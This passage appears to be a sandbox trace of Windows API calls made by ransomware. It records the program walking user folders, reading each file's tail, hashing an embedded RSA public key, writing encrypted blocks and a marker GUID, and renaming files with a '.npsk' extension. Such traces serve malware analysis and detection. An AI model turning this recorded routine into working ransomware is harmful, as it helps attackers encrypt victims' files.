hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.435] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.435] GetLastError () returned 0x0 [0216.435] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.435] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.435] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.435] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.435] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.435] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.436] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe8bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.436] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.436] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.436] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.436] CloseHandle (hObject=0x61c) returned 1 [0216.439] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\tGmp.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\tgmp.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\tGmp.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\tgmp.rtf.npsk")) returned 1 [0216.440] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xada38390, ftCreationTime.dwHighDateTime=0x1d5dc4b, ftLastAccessTime.dwLowDateTime=0xc052cce0, ftLastAccessTime.dwHighDateTime=0x1d5dbf5, ftLastWriteTime.dwLowDateTime=0xc052cce0, ftLastWriteTime.dwHighDateTime=0x1d5dbf5, nFileSizeHigh=0x0, nFileSizeLow=0x134f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="umeOOZ0__QYx.xls", cAlternateFileName="UMEOOZ~1.XLS")) returned 1 [0216.441] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\umeOOZ0__QYx.xls") returned=".xls" [0216.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\umeOOZ0__QYx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\umeooz0__qyx.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.441] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=79092) returned 1 [0216.441] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.442] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x134ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.442] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.444] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x134f4, lpOverlapped=0x0) returned 1 [0216.445] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.445] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.445] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.445] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.446] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.446] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.446] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.446] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.446] GetLastError () returned 0x0 [0216.446] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.446] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.446] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.446] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.446] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.446] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.447] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x134f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.447] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.447] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.447] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.447] CloseHandle (hObject=0x61c) returned 1 [0216.448] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\umeOOZ0__QYx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\umeooz0__qyx.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\umeOOZ0__QYx.xls.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\umeooz0__qyx.xls.npsk")) returned 1 [0216.450] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf1afe70, ftCreationTime.dwHighDateTime=0x1d5e0fe, ftLastAccessTime.dwLowDateTime=0xf27b6ec0, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0xf27b6ec0, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zwRzh", cAlternateFileName="")) returned 1 [0216.450] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf1afe70, ftCreationTime.dwHighDateTime=0x1d5e0fe, ftLastAccessTime.dwLowDateTime=0xf27b6ec0, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0xf27b6ec0, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zwRzh", cAlternateFileName="")) returned 0 [0216.450] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.450] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.450] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0216.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0216.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.450] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.451] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.451] PathFindFileNameW (pszPath="") returned="" [0216.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.451] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.451] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0216.451] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0216.451] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0216.451] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0216.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.452] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=236) returned 1 [0216.452] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.454] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.454] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.454] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xec, lpOverlapped=0x0) returned 1 [0216.454] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.455] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.455] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.456] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.456] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.456] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.456] GetLastError () returned 0x0 [0216.456] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.456] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.456] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.456] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.456] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.456] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.456] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.456] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.456] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.456] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.457] CloseHandle (hObject=0x61c) returned 1 [0216.457] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.npsk")) returned 1 [0216.459] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0216.459] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0216.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.459] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=226) returned 1 [0216.459] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.461] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.461] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.462] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xe2, lpOverlapped=0x0) returned 1 [0216.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.462] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.463] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.463] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.463] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.463] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.463] GetLastError () returned 0x0 [0216.463] CryptDestroyHash 